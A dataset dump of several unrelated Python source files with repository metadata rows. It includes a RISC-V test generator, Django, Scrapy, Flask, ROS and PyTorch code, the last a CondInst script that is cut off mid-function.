            labels.POST_TRANSFORM_OUTPUT_SCHEMA_PATH_LABEL:
                '/post_transform_schema',
        }, result)
def testGetStatusOutputPathsEntriesMissingArtifact(self):
pre_transform_stats = standard_artifacts.ExampleStatistics()
pre_transform_stats.uri = '/pre_transform_stats'
with self.assertRaisesRegex(
ValueError, 'all stats_output_paths should be specified or none'):
executor_utils.GetStatsOutputPathEntries(False, {
standard_component_specs.PRE_TRANSFORM_STATS_KEY:
[pre_transform_stats]
})
if __name__ == '__main__':
  # Delegate to the TensorFlow test runner when executed as a script.
  tf.test.main()
| 39.889908 | 80 | 0.722516 |
3ad380b2ffcde7df6679cbb1d4378e9417a3ee46 | 5,675 | py | Python | modules/decompressor/uatg_decompressor_floating_01.py | incoresemi/chromite_uatg_tests | ff3116407c16eef0e73a1f3527075efdb2a4eb14 | [
"BSD-3-Clause"
] | 3 | 2021-09-17T04:53:08.000Z | 2021-09-17T06:14:23.000Z | modules/decompressor/uatg_decompressor_floating_01.py | incoresemi/chromite_uatg_tests | ff3116407c16eef0e73a1f3527075efdb2a4eb14 | [
"BSD-3-Clause"
] | 3 | 2022-01-04T06:52:50.000Z | 2022-02-09T13:25:29.000Z | modules/decompressor/uatg_decompressor_floating_01.py | incoresemi/chromite_uatg_tests | ff3116407c16eef0e73a1f3527075efdb2a4eb14 | [
"BSD-3-Clause"
] | 2 | 2022-01-04T04:36:40.000Z | 2022-01-04T05:32:24.000Z | # python program to generate an assembly file which checks if mis-predictions
# occur In addition to this, the GHR is also filled with ones (additional
# test case) uses assembly macros
from typing import Dict, List, Union, Any
# To-Do -> Create another function which prints the includes and other
# assembler directives complying to the test format spec
from yapsy.IPlugin import IPlugin
from uatg.utils import paging_modes
class uatg_decompressor_floating_01(IPlugin):
    """uatg plugin that emits an assembly test exercising the RISC-V
    compressed ('C') floating-point load/store encodings, plus the matching
    SystemVerilog covergroup for the decompressor's input signal."""
    def __init__(self):
        super().__init__()
        # Defaults; overwritten from the ISA YAML in execute().
        self.isa = "RV64I"
        self.split_isa = "RV64I"
        self.modes = []
    def execute(self, core_yaml, isa_yaml):
        """Read hart0's ISA/satp configuration and decide whether this
        test applies; records the privilege and paging modes to cover."""
        self.isa = isa_yaml['hart0']['ISA']
        # we split the ISA based on Z because, we are checking for
        # 'C' and 'F' standard extensions. When Zifencei or Zicsr are
        # enabled, the test using 'in' keyword will not return the expected
        # result.
        self.split_isa = self.isa.split('Z')
        self.modes = ['machine']
        if 'S' in self.isa:
            self.modes.append('supervisor')
        if 'U' in self.isa:
            self.modes.append('user')
        if 'RV32' in self.isa:
            isa_string = 'rv32'
        else:
            isa_string = 'rv64'
        try:
            if isa_yaml['hart0']['satp'][f'{isa_string}']['accessible']:
                mode = isa_yaml['hart0']['satp'][f'{isa_string}']['mode'][
                    'type']['warl']['legal']
                self.satp_mode = mode[0]
        except KeyError:
            pass
        # NOTE(review): if the satp entry is missing (KeyError above),
        # self.satp_mode is never assigned and the next line raises
        # AttributeError -- confirm satp is always present upstream.
        self.paging_modes = paging_modes(self.satp_mode, self.isa)
        # NOTE(review): `'C' and 'F' in x` evaluates as `'F' in x` only,
        # because the string 'C' is a truthy constant; the 'C' extension
        # is effectively not checked here -- confirm intent.
        if 'C' and 'F' in self.split_isa[0]:
            return True
        else:
            return False
    def generate_asm(self) -> List[Dict[str, Union[Union[str, list], Any]]]:
        """This function will return all the compressed instructions"""
        for mode in self.modes:
            machine_exit_count = 0
            for paging_mode in self.paging_modes:
                # Machine mode does not depend on paging, so emit it once.
                if mode == 'machine':
                    if machine_exit_count > 0:
                        continue
                    machine_exit_count = machine_exit_count + 1
                # Enable the FPU via mstatus.FS, then exercise the
                # compressed FP load/store encodings
                # (c.fsdsp / c.fldsp / c.fsd / c.fld).
                asm = f"#define RVTEST_FP_ENABLE()\n" \
                      f"\tLI x2, MSTATUS_FS;\n" \
                      f"\tcsrrs x3, mstatus,x0;\n" \
                      f"\tor x2, x3, x2;\n" \
                      f"\tcsrrw x0,mstatus,x2;\n" \
                      f"\n\n\t## test: floating ##\n\n" \
                      f"\t###Integer Constant-Generation Instructions###\n" \
                      f"\t###Floating Point and Stack Pointer Based Load and " \
                      f"Store####\n\n\tLA (x2,sample_data)\n" \
                      f"\tc.fsdsp f8,8(x2)\n" \
                      f"\tc.fldsp f12,8(x2)\n" \
                      f"\t###Floating Point Load and Store####\n" \
                      f"\tLA (x10,sample_data)\n" \
                      f"\tc.fsd f11,8(x10)\n" \
                      f"\tLA (x12,sample_data)\n" \
                      f"\tc.fld f9,8(x12)\n" \
                # compile macros for the test
                if mode != 'machine':
                    compile_macros = ['rvtest_mtrap_routine', 's_u_mode_test']
                else:
                    compile_macros = []
                # trap signature bytes
                trap_sigbytes = 24
                # initialize the signature region
                sig_code = 'mtrap_count:\n .fill 1, 8, 0x0\n' \
                           'mtrap_sigptr:\n' \
                           f' .fill {trap_sigbytes // 4},4,0xdeadbeef\n'
                asm_data = f'\n.align 3\n\n'\
                           f'exit_to_s_mode:\n.dword\t0x1\n\n'\
                           f'sample_data:\n.word\t0xbabecafe\n'\
                           f'.word\t0xdeadbeef\n\n'\
                           f'.align 3\n\nsatp_mode_val:\n.dword\t0x0\n\n'
                # user can choose to generate supervisor and/or user tests in
                # addition to machine mode tests here.
                privileged_test_enable = False
                # NOTE(review): remove() raises ValueError when the entry is
                # absent -- e.g. on the second pass of the outer loop after
                # both modes were already removed; it also mutates the list
                # being iterated by the outer loop. Confirm this only ever
                # runs with ['machine', 'supervisor', 'user'] once.
                if not privileged_test_enable:
                    self.modes.remove('supervisor')
                    self.modes.remove('user')
                privileged_test_dict = {
                    'enable': privileged_test_enable,
                    'mode': mode,
                    'page_size': 4096,
                    'paging_mode': paging_mode,
                    'll_pages': 64,
                }
                # NOTE(review): 'asm_sig' is never assigned in this method;
                # consuming the generator will raise NameError. It likely
                # should be built from sig_code / asm_data above -- confirm.
                yield ({
                    'asm_code': asm,
                    'asm_sig': asm_sig,
                    'compile_macros': compile_macros,
                    'privileged_test': privileged_test_dict,
                    'docstring': 'This test fills ghr register with ones',
                    'name_postfix': f"{mode}-" + ('' if mode == 'machine' else paging_mode)
                })
    def generate_covergroups(self, config_file):
        """
        returns the covergroups for this test
        """
        config = config_file
        # Name of the decompressor's input signal, taken from the DUT config.
        fn_decompress_inst = config['decompressor']['input'][
            'decompressor_input']
        sv = f"""covergroup floating_point_cg @(posedge CLK);\n
        option.per_instance=1;
        ///coverpoint for floating point instructions
        floating_point_cp : coverpoint {fn_decompress_inst}"""
        sv += "{\n"
        sv += """ wildcard bins C_FLDSP = {16'b001_x_xxxxx_xxxxx_10};\n
        wildcard bins C_FSDSP = {16'b101_xxxxxx_xxxxx_10};\n
        wildcard bins C_FLD = {16'b001_xxx_xxx_xx_xxx_00};\n
        wildcard bins C_FSD = {16'b101_xxx_xxx_xx_xxx_00};\n
        }
        endgroup\n"""
        return sv
| 37.091503 | 91 | 0.514185 |
3ad446c1b07e34f2fa0ee1ef1453cf07206ea6ad | 975 | py | Python | backend/account_request/migrations/0002_auto_20190214_2145.py | adabutch/account_tracker | 2ae6e287266262557268f080cff821a736d6ec8b | [
"MIT"
] | null | null | null | backend/account_request/migrations/0002_auto_20190214_2145.py | adabutch/account_tracker | 2ae6e287266262557268f080cff821a736d6ec8b | [
"MIT"
] | 2 | 2020-02-11T15:45:51.000Z | 2020-07-17T16:47:06.000Z | backend/account_request/migrations/0002_auto_20190214_2145.py | adabutch/account_tracker | 2ae6e287266262557268f080cff821a736d6ec8b | [
"MIT"
] | null | null | null | # Generated by Django 2.1.5 on 2019-02-14 21:45
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: relax four AccountRequest character
    columns (division, facility, middle_name, suffix) so they accept
    blank form input and NULL at the database level."""
    dependencies = [
        ('account_request', '0001_initial'),
    ]
    operations = [
        # Each AlterField redefines the column with blank=True/null=True;
        # the max_length values are part of the new field definitions.
        migrations.AlterField(
            model_name='accountrequest',
            name='division',
            field=models.CharField(blank=True, max_length=50, null=True),
        ),
        migrations.AlterField(
            model_name='accountrequest',
            name='facility',
            field=models.CharField(blank=True, max_length=50, null=True),
        ),
        migrations.AlterField(
            model_name='accountrequest',
            name='middle_name',
            field=models.CharField(blank=True, max_length=50, null=True),
        ),
        migrations.AlterField(
            model_name='accountrequest',
            name='suffix',
            field=models.CharField(blank=True, max_length=10, null=True),
        ),
    ]
| 28.676471 | 73 | 0.585641 |
3ad6ff269fcd4396a9cf1a6ea13465342af4b41c | 2,017 | py | Python | kingfisher_scrapy/spiders/uruguay_historical.py | open-contracting/kingfisher-collect | 2fbbd6361a0ec959e0603343a4b363f97fae3815 | [
"BSD-3-Clause"
] | 7 | 2020-07-24T13:15:37.000Z | 2021-12-11T22:40:07.000Z | kingfisher_scrapy/spiders/uruguay_historical.py | open-contracting/kingfisher-collect | 2fbbd6361a0ec959e0603343a4b363f97fae3815 | [
"BSD-3-Clause"
] | 418 | 2020-04-27T22:15:27.000Z | 2022-03-31T23:49:34.000Z | kingfisher_scrapy/spiders/uruguay_historical.py | open-contracting/kingfisher-collect | 2fbbd6361a0ec959e0603343a4b363f97fae3815 | [
"BSD-3-Clause"
] | 6 | 2020-05-28T16:06:53.000Z | 2021-03-16T02:54:15.000Z | import datetime
import scrapy
from kingfisher_scrapy.base_spider import CompressedFileSpider
from kingfisher_scrapy.util import components, handle_http_error
class UruguayHistorical(CompressedFileSpider):
    """
    Domain
      Agencia Reguladora de Compras Estatales (ARCE)
    Spider arguments
      from_date
        Download only data from this year onward (YYYY format).
        If ``until_date`` is provided, defaults to '2002'.
      until_date
        Download only data until this year (YYYY format).
        If ``from_date`` is provided, defaults to the current year.
    Bulk download documentation
      https://www.gub.uy/agencia-compras-contrataciones-estado/datos-y-estadisticas/datos/open-contracting
    """
    name = 'uruguay_historical'
    download_timeout = 1000
    # BaseSpider
    date_format = 'year'
    default_from_date = '2002'
    skip_pluck = 'Already covered (see code for details)'  # uruguay_releases
    # SimpleSpider
    data_type = 'release_package'
    def start_requests(self):
        """Request the CKAN package metadata that lists the bulk files."""
        # A CKAN API JSON response.
        url = 'https://catalogodatos.gub.uy/api/3/action/package_show?id=arce-datos-historicos-de-compras'
        yield scrapy.Request(url, meta={'file_name': 'list.json'}, callback=self.parse_list)
    @handle_http_error
    def parse_list(self, response):
        """Yield one download request per JSON resource, filtered by the
        year embedded in the resource's file name."""
        data = response.json()
        for resource in data['result']['resources']:
            if resource['format'].upper() == 'JSON':
                url = resource['url']
                if self.from_date and self.until_date:
                    # URL looks like
                    # https://catalogodatos.gub.uy/dataset/44d3-b09c/resource/1e39-453d/download/ocds-2002.zip
                    # so the year is the final dash-separated token.
                    url_year = int(url.split('-')[-1].split('.')[0])
                    url_date = datetime.datetime(url_year, 1, 1)
                    if not (self.from_date <= url_date <= self.until_date):
                        continue
                yield self.build_request(url, formatter=components(-1))
| 38.056604 | 110 | 0.644522 |
3ad6ff65fc6e55b853f7c971880fa3dab4b97d0c | 1,136 | py | Python | toSpcy/toSpacy.py | patrick013/toSpcy | 8c10bc01e4a549dc177e1efb18c9c87a4dbd6f4c | [
"Apache-2.0"
] | 3 | 2019-11-07T17:29:57.000Z | 2022-03-21T01:45:04.000Z | toSpcy/toSpacy.py | patrick013/toSpcy | 8c10bc01e4a549dc177e1efb18c9c87a4dbd6f4c | [
"Apache-2.0"
] | null | null | null | toSpcy/toSpacy.py | patrick013/toSpcy | 8c10bc01e4a549dc177e1efb18c9c87a4dbd6f4c | [
"Apache-2.0"
] | null | null | null | import re
class Convertor():
    """Converts inline-tagged strings ("... <TAG>text</TAG> ...") into spaCy
    training tuples: ``(plain_text, {'entities': [(start, end, label)]})``.
    """

    def __init__(self, tagslabels=None):
        # BUG FIX: the original signature used a mutable default argument
        # (``tagslabels={}``). The dict is only read here, so behavior is
        # unchanged, but the None-sentinel form avoids the shared-default
        # pitfall and stays call-compatible.
        # Optional mapping from raw tag names to output labels.
        self._tagslabels = {} if tagslabels is None else tagslabels

    def _handleLabel(self, tag):
        """Map a raw tag to its configured label; unknown tags pass through."""
        return self._tagslabels.get(tag, tag)

    def _handleSingle(self, t):
        """Convert one tagged string.

        Returns the (text, entities) tuple, or None (after printing an
        error) when the tags in ``t`` do not pair up cleanly.
        """
        entities = []
        index = 0
        t = re.sub(r'\s+', ' ', t)  # collapse runs of whitespace
        tList = re.split('(<[a-zA-Z]+>[^<]+</[a-zA-Z]+>)', t)
        # A well-formed split alternates plain/tagged chunks -> odd length.
        if len(tList) % 2 == 0:
            print("Error! Some labels might be missed! ")
            return
        pattern = re.compile("<[a-zA-Z]+>[^<]+</[a-zA-Z]+>")
        for ele in tList:
            if pattern.match(ele):
                # Length of the span once the surrounding tags are stripped.
                len_notag = len(''.join(re.split('</?[a-zA-Z]+>', ele)))
                entities.append((index, index + len_notag,
                                 self._handleLabel(re.split('.+</|>', ele)[1])))
                index += len_notag
            else:
                index += len(ele)
        return (''.join(re.split('</?[a-zA-Z]+>', t)), {'entities': entities})

    def toSpacyFormat(self, tagged_data):
        """Convert an iterable of tagged strings into spaCy format."""
        return [self._handleSingle(data) for data in tagged_data]
| 31.555556 | 80 | 0.491197 |
3ad7245b008d3289d24d032c2d3cd8b153b127c9 | 634 | py | Python | main.py | iarwain8a/pydlbot | 3d471795da3f5f17f2e784a9fa508f9dd5613bd3 | [
"MIT"
] | null | null | null | main.py | iarwain8a/pydlbot | 3d471795da3f5f17f2e784a9fa508f9dd5613bd3 | [
"MIT"
] | null | null | null | main.py | iarwain8a/pydlbot | 3d471795da3f5f17f2e784a9fa508f9dd5613bd3 | [
"MIT"
] | null | null | null | import pydlbot_ui as Ui
import sys
from PyQt5 import QtGui, QtCore, QtWidgets
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
import time
import threading
def main():
    """Create the Qt application and show the main window; blocks until
    the GUI exits (sys.exit on app.exec_())."""
    app = QtWidgets.QApplication(sys.argv)
    MainWindow = QtWidgets.QMainWindow()
    ui = Ui.Ui_MainWindow()
    ui.setupUi(MainWindow)
    MainWindow.show()
    sys.exit(app.exec_())
def f(id):
    """Worker used to demonstrate threads; just reports its id."""
    print ("thread function",id)
    return
if __name__ == '__main__':
    # BUG FIX: this guard originally appeared *before* main() and f() were
    # defined, so running the script raised NameError at the Thread
    # construction. Definitions now precede their use; the runtime
    # behavior of the guard itself is unchanged.
    p = threading.Thread(target=main)
    p.start()
    for i in range(3):
        t = threading.Thread(target=f,args=(i,))
        t.start()
| 22.642857 | 56 | 0.656151 |
3ad734bd68154710d060d7aea6f8d2354fbd9080 | 6,832 | py | Python | src/view/deprecated/files.py | fred-yu-2013/Elastos.Hive.Node | 1dcc9178c12efefc786bc653bacec50a1f79161b | [
"MIT"
] | 5 | 2020-11-18T09:14:24.000Z | 2021-08-17T13:55:49.000Z | src/view/deprecated/files.py | fred-yu-2013/Elastos.Hive.Node | 1dcc9178c12efefc786bc653bacec50a1f79161b | [
"MIT"
] | 45 | 2020-11-09T03:40:53.000Z | 2021-11-02T08:43:49.000Z | src/view/deprecated/files.py | fred-yu-2013/Elastos.Hive.Node | 1dcc9178c12efefc786bc653bacec50a1f79161b | [
"MIT"
] | 5 | 2021-01-25T16:25:59.000Z | 2021-09-23T20:18:12.000Z | # -*- coding: utf-8 -*-
"""
The view of files module.
"""
from flask import Blueprint, request
from src.modules.files.files import Files
from src.utils.http_exception import BadRequestException
# Flask blueprint hosting the deprecated v2 files endpoints.
blueprint = Blueprint('files-deprecated', __name__)
# Shared Files service; None until init_app() is called at startup.
files: Files = None
def init_app(app):
    """ This will be called by application initializer. """
    global files
    # Instantiate the shared Files service used by every route below.
    files = Files()
    app.register_blueprint(blueprint)
@blueprint.route('/api/v2/vault/files-deprecated/<regex("(|[0-9a-zA-Z_/.]*)"):path>', methods=['GET'])
def reading_operation(path):
    """ Dispatch the read-only file operations selected by the optional
    URL parameter 'comp'.

    .. :quickref: 04 Files; Download/properties/hash/list

    Behaviour by 'comp':

    - absent: download the raw content of the file at ``path``;
    - ``children``: list the entries (name, is_file, size) of the folder;
    - ``metadata``: return the properties (name, is_file, size, created,
      updated) of the file;
    - ``hash``: return the SHA-256 hash of the file content;
    - anything else: respond with 400 Bad Request.

    All variants may also fail with 400 Bad Request, 401 Unauthorized,
    403 Forbidden or 404 Not Found.
    """
    component = request.args.get('comp')
    if not component:
        # No 'comp' parameter: stream the file content itself.
        return files.download_file(path)
    # Map each recognized 'comp' value to its handler on the Files service.
    handlers = {
        'children': files.list_folder,
        'metadata': files.get_properties,
        'hash': files.get_hash,
    }
    handler = handlers.get(component)
    if handler is None:
        return BadRequestException(msg='invalid parameter "comp"').get_error_response()
    return handler(path)
@blueprint.route('/api/v2/vault/files-deprecated/<path:path>', methods=['PUT'])
def writing_operation(path):
    """ Copy or upload a file at ``path``.

    .. :quickref: 04 Files; Copy/upload

    With the URL parameter ``dest=<path/to/destination>`` the file at
    ``path`` is copied to the destination; without it, the request body is
    uploaded as the content of the file at ``path``. Both variants answer
    201 Created with ``{"name": "<path>"}`` on success, and may fail with
    400 Bad Request, 401 Unauthorized, 403 Forbidden, 404 Not Found or
    455 Already Exists (copy only).
    """
    destination = request.args.get('dest')
    if not destination:
        # No destination given (or an empty one): treat as an upload.
        return files.upload_file(path)
    return files.copy_file(path, destination)
@blueprint.route('/api/v2/vault/files-deprecated/<path:path>', methods=['PATCH'])
def move_file(path):
    """ Move the file at ``path`` to the location given by the URL
    parameter ``to=<path/to/destination>``.

    .. :quickref: 04 Files; Move

    Answers 200 OK with ``{"name": "<destination>"}`` on success; may fail
    with 400 Bad Request, 401 Unauthorized, 403 Forbidden, 404 Not Found
    or 455 Already Exists.
    """
    # Delegates entirely to the Files service; a missing 'to' parameter is
    # forwarded as None and validated there.
    return files.move_file(path, request.args.get('to'))
@blueprint.route('/api/v2/vault/files-deprecated/<path:path>', methods=['DELETE'])
def delete_file(path):
    """ Delete the file by path.
    .. :quickref: 04 Files; Delete
    **Request**:
    .. sourcecode:: http
        None
    **Response OK**:
    .. sourcecode:: http
        HTTP/1.1 204 No Content
    **Response Error**:
    .. sourcecode:: http
        HTTP/1.1 400 Bad Request
    .. sourcecode:: http
        HTTP/1.1 401 Unauthorized
    .. sourcecode:: http
        HTTP/1.1 403 Forbidden
    """
    # Delegates entirely to the Files service.
    return files.delete_file(path)
| 17.884817 | 102 | 0.562207 |
3ad8fecb1b29ee0733883fd90b75697788d9e406 | 2,109 | py | Python | backend_final/apartacho/users/views.py | cenavia/skylynx | 6286294a8cd57279e3c176d8fcae656cef4b40a8 | [
"MIT"
] | 3 | 2020-04-29T18:07:40.000Z | 2020-05-20T20:52:52.000Z | backend_final/apartacho/users/views.py | cenavia/Apartacho | 6286294a8cd57279e3c176d8fcae656cef4b40a8 | [
"MIT"
] | 53 | 2020-05-13T03:27:41.000Z | 2022-03-12T00:32:46.000Z | backend_final/apartacho/users/views.py | cenavia/Apartacho | 6286294a8cd57279e3c176d8fcae656cef4b40a8 | [
"MIT"
] | 2 | 2020-05-16T05:34:45.000Z | 2020-06-11T14:47:50.000Z | """Users views."""
# Django REST Framework
from rest_framework.viewsets import GenericViewSet
from rest_framework.mixins import (ListModelMixin,
RetrieveModelMixin,
UpdateModelMixin)
from rest_framework import status
from rest_framework.decorators import action
from rest_framework.response import Response
# Serializers
from apartacho.users.serializers import (
AccountVerificationSerializer,
UserLoginSerializer,
UserModelSerializer,
UserSignUpSerializer
)
# Models
from apartacho.users.models import User
class UserViewSet(ListModelMixin,
                  RetrieveModelMixin,
                  UpdateModelMixin,
                  GenericViewSet):
    """User view set.

    Handles sign up, login and account verification for active users,
    looked up by email.
    """
    queryset = User.objects.filter(is_active=True)
    serializer_class = UserModelSerializer
    lookup_field = 'email'

    @action(detail=False, methods=['post'])
    def login(self, request):
        """Authenticate a user and return the profile plus access token."""
        serializer = UserLoginSerializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        user, token = serializer.save()
        payload = {
            'user': UserModelSerializer(user).data,
            'access_token': token
        }
        return Response(payload, status=status.HTTP_200_OK)

    @action(detail=False, methods=['post'])
    def signup(self, request):
        """Register a new user and return the created profile."""
        serializer = UserSignUpSerializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        created = serializer.save()
        return Response(
            UserModelSerializer(created).data, status=status.HTTP_201_CREATED)

    @action(detail=False, methods=['post'])
    def verify(self, request):
        """Confirm an account from its verification payload."""
        serializer = AccountVerificationSerializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        serializer.save()
        return Response(
            {'message': 'Congratulation, now go find to dream!'},
            status=status.HTTP_200_OK)
| 31.954545 | 69 | 0.662399 |
3ad9ef77b1856ec357338eec91418078b9e1ee31 | 1,069 | py | Python | examples/cpp/simplicial_complex.py | TripleEss/TDALayer | 25a2da5eab50fad2d006167c2d1c97ec5efb53e0 | [
"MIT"
] | null | null | null | examples/cpp/simplicial_complex.py | TripleEss/TDALayer | 25a2da5eab50fad2d006167c2d1c97ec5efb53e0 | [
"MIT"
] | null | null | null | examples/cpp/simplicial_complex.py | TripleEss/TDALayer | 25a2da5eab50fad2d006167c2d1c97ec5efb53e0 | [
"MIT"
] | null | null | null | from __future__ import print_function
from topologylayer.functional.persistence import SimplicialComplex, persistenceForwardCohom
from topologylayer.util.process import remove_zero_bars
import torch
# Build the simplicial complex: a cycle graph on vertices 1,2,3,4,
# coned off at vertex 0.  The append order matches the original example:
# vertices, cone edges, cycle edges, then the filling triangles.
s = SimplicialComplex()
vertices = ([0], [1], [2], [3], [4])
edges = ([0, 1], [0, 2], [0, 3], [0, 4],
         [1, 2], [1, 3], [4, 2], [4, 3])
triangles = ([0, 1, 2], [0, 1, 3], [0, 2, 4], [0, 3, 4])
for simplex in vertices + edges + triangles:
    s.append(simplex)
# initialize internal data structures
s.initialize()
# Vertex function for sub-level set persistence.
# Expected bars: a single H0 [0,inf] and a single H1 [0,2].
f = torch.Tensor([2., 0., 0., 0., 0.])
# extend the filtration to the whole simplicial complex
s.extendFloat(f)
# compute persistence with MAXDIM=1
ret = persistenceForwardCohom(s, 1)
for k in range(2):
    print("dimension %d bars" % k)
    print(remove_zero_bars(ret[k]))
| 20.960784 | 92 | 0.669785 |
3ada4a4b168c9f32d42b44792e037eaf4b8ba00b | 4,020 | py | Python | python/featureextraction/subscriber.py | JonathanCamargo/Eris | 34c389f0808c8b47933605ed19d98e62280e56dd | [
"MIT"
] | null | null | null | python/featureextraction/subscriber.py | JonathanCamargo/Eris | 34c389f0808c8b47933605ed19d98e62280e56dd | [
"MIT"
] | null | null | null | python/featureextraction/subscriber.py | JonathanCamargo/Eris | 34c389f0808c8b47933605ed19d98e62280e56dd | [
"MIT"
] | null | null | null | import rospy
import threading
import importlib
from collections import deque
from custom_msgs.msg import *
def Subscriber(topic_name, type_str, window):
    """Create a GenericSubscriber for ``topic_name``.

    Params:
        topic_name: topic to subscribe to (e.g. /myrobot/somemessage).
        type_str: message type, given either as the message class itself
            or as a string in the form 'package_name/message_type' or
            'package_name.msg.message_type'.
        window: queue size forwarded to GenericSubscriber.
    Returns:
        The GenericSubscriber instance.
    Raises:
        ValueError: if ``type_str`` is in an unrecognized format.
        ImportError: if the message package cannot be imported.
    """
    # Normalize a message class into its dotted module path,
    # e.g. 'custom_msgs.msg._JointState'.
    if not isinstance(type_str, str):
        type_str = type_str.__module__
    if '.' in type_str:
        # 'package.msg._MessageType': the class name is the third dotted
        # component with its leading underscore stripped.
        parts = type_str.split('.')
        package_name = parts[0]
        class_name = parts[2][1:]
    elif '/' in type_str:
        package_name, class_name = type_str.split('/')[:2]
    else:
        # BUG FIX: the original fell through here with 'subscriber' (and,
        # in the error message, 'package_name') unbound, crashing with an
        # UnboundLocalError; fail fast with a descriptive error instead.
        raise ValueError(
            "unrecognized message type %r; expected 'pkg/Type' or "
            "'pkg.msg.Type'" % (type_str,))
    try:
        module_ = importlib.import_module(package_name + '.msg')
        data_class = getattr(module_, class_name)
        subscriber = GenericSubscriber(topic_name, data_class, window)
    except ImportError as e:
        print('ERROR in ' + package_name + '.msg')
        raise ImportError("package %s not found %s" % (package_name, e))
    return subscriber
# A generic subscriber class for interfacing any type of message into the GUI
class GenericSubscriber(object):
    """Buffers incoming ROS messages of an arbitrary type in a bounded queue.

    The channel names are taken from the message class's __slots__; a
    'header' field is reduced to its timestamp in seconds.
    """
    def __init__(self, topic, data_class, QUEUE_SIZE=1000):
        # Properties
        self.topic = ""  # topic name (e.g. /myrobot/someNamespace/somemessage)
        self.data_class = ""  # message class (e.g. custom_msgs.msg.JointState)
        self.registered = False  # True while the subscriber is listening
        self.paused = False  # True suspends appending data to the queue
        self.channels = None
        self.queue = deque(maxlen=QUEUE_SIZE)  # bounded buffer of samples
        self.subs = None  # underlying rospy subscriber object
        if topic != "":
            self.topic = topic
        self.data_class = data_class
        self.channels = self.data_class.__slots__
        self.channel_types = self.data_class._slot_types

    def callback(self, msg):
        """rospy callback: flatten the message fields and buffer them."""
        # Debug hook (kept from the original):
        # rospy.loginfo(rospy.get_caller_id()+" %s", msg)
        if self.paused == False:
            # Get each field in the message.
            data = []
            for channel in self.channels:
                if channel == 'header':
                    # For a header keep only its timestamp in seconds.
                    time = msg.header.stamp.secs + msg.header.stamp.nsecs / 1.0E9
                    data.append(time)
                else:
                    data.append(getattr(msg, channel))
            self.append(data)

    def listener(self):
        """Register with rospy; sets ``registered`` on success."""
        try:
            self.subs = rospy.Subscriber(self.topic, self.data_class, self.callback)
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
            # are no longer swallowed; the best-effort behavior is preserved.
            print("Could not subscribe")
        else:
            self.registered = True

    def append(self, newElement):
        """Append one flattened sample unless the subscriber is paused."""
        if self.paused == False:
            self.queue.append(newElement)

    def getQueue(self):
        """Return a snapshot (shallow copy) of the buffered samples."""
        return list(self.queue)

    def getChannels(self):
        """Return the tuple of channel (field) names."""
        return self.channels

    def unsubscribe(self):
        """Stop listening to the topic, if currently registered."""
        if self.subs is not None:
            self.subs.unregister()
            self.registered = False

    def subscribe(self):
        """Start listening to the topic in a background thread (idempotent)."""
        if self.registered is False:
            # BUG FIX: the original passed ``target=self.listener()`` which
            # *called* listener() immediately in the current thread and gave
            # the Thread a None target; pass the bound method instead.
            self.t = threading.Thread(target=self.listener)
            self.t.start()
            self.registered = True

    def __str__(self):
        ''' Overload str to use print for the subscriber'''
        string_1 = "Topic: {0}\nChannels:{1}\nChannel types:{2}\n".format(
            self.topic, self.channels, self.channel_types)
        if self.registered is True:
            string_2 = "This subscriber is registered"
        else:
            string_2 = "This subscriber is NOT registered"
        return string_1 + string_2
| 34.358974 | 116 | 0.615672 |
3adcb0e64f1098771d6fe0dddfcf3ecb6a0a3c9a | 19,324 | py | Python | scripts/condinst.py | Spritaro/condinst_tensorrt | 22063a75e015bba45b588cdb6ebf1ac663ff1924 | [
"MIT"
] | 3 | 2021-11-14T14:11:10.000Z | 2022-02-16T11:42:40.000Z | scripts/condinst.py | datomi79/condinst_tensorrt | 22063a75e015bba45b588cdb6ebf1ac663ff1924 | [
"MIT"
] | null | null | null | scripts/condinst.py | datomi79/condinst_tensorrt | 22063a75e015bba45b588cdb6ebf1ac663ff1924 | [
"MIT"
] | 1 | 2022-02-14T21:47:55.000Z | 2022-02-14T21:47:55.000Z | import math
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn
from torch.utils.data import DataLoader, random_split
from torch.utils.tensorboard import SummaryWriter
import torchvision
# from torchvision.models.detection.backbone_utils import resnet_fpn_backbone
# from torchvision.ops.focal_loss import sigmoid_focal_loss
from loss import heatmap_focal_loss
from loss import dice_loss
def get_centroid_indices(masks):
    """
    Compute the integer (x, y) center-of-mass pixel of each mask.

    Params:
        masks: Tensor[num_objects, height, width]
    Returns:
        centroids: Tensor[num_objects, (x, y)] of dtype int64
    """
    _, height, width = masks.shape
    xs = torch.arange(0, width, 1, dtype=masks.dtype, device=masks.device)
    ys = torch.arange(0, height, 1, dtype=masks.dtype, device=masks.device)
    # Tiny epsilon keeps empty masks from dividing by zero.
    areas = masks.sum(dim=(1, 2)) + 1e-9
    # Weight each coordinate by the mask's row/column marginals, normalize
    # by area, then truncate to integer pixel indices.
    cx = torch.sum(masks.sum(dim=1) * xs[None, :], dim=1) / areas
    cy = torch.sum(masks.sum(dim=2) * ys[None, :], dim=1) / areas
    return torch.stack((cx, cy), dim=1).to(torch.int64)
def generate_heatmap(gt_labels, gt_masks, num_classes):
    """
    Render one Gaussian per object onto a per-class heatmap.

    Params:
        gt_labels: Tensor[num_objects]
        gt_masks: Tensor[num_objects, height, width]
        num_classes: number of heatmap channels
    Returns:
        heatmap: Tensor[num_classes, height, width]
        centroids: Tensor[num_objects, (x, y)]
    """
    num_objects, height, width = gt_masks.shape
    dtype, device = gt_masks.dtype, gt_masks.device
    centroids = get_centroid_indices(gt_masks)  # Tensor[num_objects, (x, y)]
    # Per-object Gaussian variance grows with the mask's relative area.
    radius2 = torch.sum(gt_masks, dim=(1, 2)) / height / width * 10 + 1
    xs = torch.arange(0, width, 1, dtype=dtype, device=device)
    ys = torch.arange(0, height, 1, dtype=dtype, device=device)
    grid_y, grid_x = torch.meshgrid(ys, xs)  # each [height, width]
    heatmap = torch.zeros(size=(num_classes, height, width), dtype=dtype, device=device)
    for obj in range(num_objects):
        cls = gt_labels[obj]
        cx = centroids[obj][0]
        cy = centroids[obj][1]
        gaussian = torch.exp(
            -((grid_x - cx) ** 2 + (grid_y - cy) ** 2) / (2. * radius2[obj]))
        # Element-wise maximum so overlapping objects keep the stronger peak.
        heatmap[cls, :, :] = torch.maximum(heatmap[cls, :, :], gaussian)
